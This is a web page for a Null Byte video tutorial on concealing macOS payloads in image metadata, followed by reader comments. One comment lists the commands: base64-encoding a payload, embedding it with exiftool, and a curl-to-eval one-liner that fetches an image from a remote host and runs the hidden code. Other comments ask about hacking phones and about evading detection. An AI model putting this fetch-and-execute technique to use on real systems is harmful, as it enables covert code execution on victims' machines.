Hide Payloads for MacOS Inside Photo Metadata [Tutorial]

June 8, 2019 by 33 Comments

How to Conceal Payloads Within Photo Metadata
Full Tutorial: http://bit.ly/Paylotos
Subscribe to Null Byte: https://goo.gl/J6wEnH
Kody’s Twitter: https://twitter.com/KodyKinzie

Related video on steganography: https://www.youtube.com/watch?v=9UZh-4Er7BQ

Hidden payloads are a common method hackers use to infect a target with malicious or otherwise irregular code. In previous episodes, we’ve covered how to access photo metadata and how to conceal information by way of steganography. On this episode of Cyber Weapons Lab, we’ll take things a step further by showing you how to execute code hidden within an image.

Follow Null Byte on:
Twitter: https://twitter.com/nullbytewht
Flipboard: https://flip.it/3.Gf_0
Weekly newsletter: https://eepurl.com/dE3Ovb


33 Replies to “Hide Payloads for MacOS Inside Photo Metadata [Tutorial]”

  1. Plz replay my answer

  2. K Hue says:

    Keep it coming ! I love the MacOS videos

  3. Can we use the same concept for Android and windows

  4. saurrav says:

    Bro pls make a video about android hacking and its vulnarability scanning

  5. Dayum, I can't see you BLINK!!!!!

  6. Whats the intro music?

  7. Rick says:

    Cool,bro,you’ve done a good job

  8. Please make this to on Windows and android

  9. How can hack whatsapp? It is possible?

  10. Very Nice Thank you Sir

  11. Nullbyte, you should do a series where you go to hotels or anywhere and see how much stuff you can hack that would be a banger series

  12. Vijay C says:

    how to bind payload on image for android..please! make a video! thank you!

  13. Martin says:

    hi there , please make a tutorial video for what ports hackers use to attack the computer and we must to close or disable that ports on windows.?

  14. yuthish .p says:

    How to hide a payload for Android
    And after receiving the image automatically install in Victom mobile

  15. I love your channel

  16. AH Wesal says:

    I have a question …
    Is it posseble to locate a phone number …?
    I searched a lot but still didn't get anything.

  17. I had something like this on my mind for ages, now i see it's possible and it's fucking amazing

  18. AsteroidMist says:

    Does It Work For Windows.?

  19. the bet says:

    We have a 'payload' and an image
    and we are doing:
    Image+embedding payload in image metadata
    So when victim clicks on the final image with metadata embedded on it..will it execute that payload?

  20. Thank you for the tutorial! By the way, sometimes, if u want to avoid detection, you can also carry out tasks in a sequential manner. Photo 1 does task 1. Photo 2 does task 2. Etc…to avoid detection…there's a lecture by saumil shah on stegasploit too. Anyways…THANKS!!!!

  21. why cant we hide payloads for android os in files meta data. Is it possible.

  22. syed zaidi says:

    you are a super cool man. love you

  23. allistair61 says:

    Cool video, this could be interesting for a few practical jokes. And don't worry my hat is a nice light shade of grey.

  24. Android Doesn't Connect Back to Metasploit how to fix it i need a help

  25. I was studying this for almost 6 months and still can't figure out how it is made.

    Angecryption is one of it.

  26. Sir can you please give you email id I am facing some error

  27. 2A ADDICT says:

    The commands I used: printf 'touch ~/Desktop/meta/hacked' | base64 | tr -d 'n', once you hit enter it will generate the base 64 encoded string. apt-get update && apt-get install exiftool -V, the Mac command is brew install exiftool. cd Desktop, changing the directory to my desktop. cd meta, changing the directory to my meta folder. ls, listing the files inside of this particular folder. exiftool Image.jpg, this command lists the EXIF data for the image you select. exiftool -all= Image.jpg, this command strips all of the available metadata that is there on the image you selected. exiftool -Certificate='dG91Y2ggfi9EZXNrdG9wL21ldGEvaGFja2Vk' Image.jpg, this adds the base 64 encoded payload to your image. I didn't get to check out that last command "p=$(curl -s https://website.com/image.jpg | grep Cert -a | sed 's/<[^>]*>//g' | base64 -D);eval $p", the hosting service he used costs $5 a month.

  28. B Aravind says:

    Bro im unable to upload big payloads

  29. does this work for iphone?

  30. can we hack android using stignography

  31. Will this work in android phone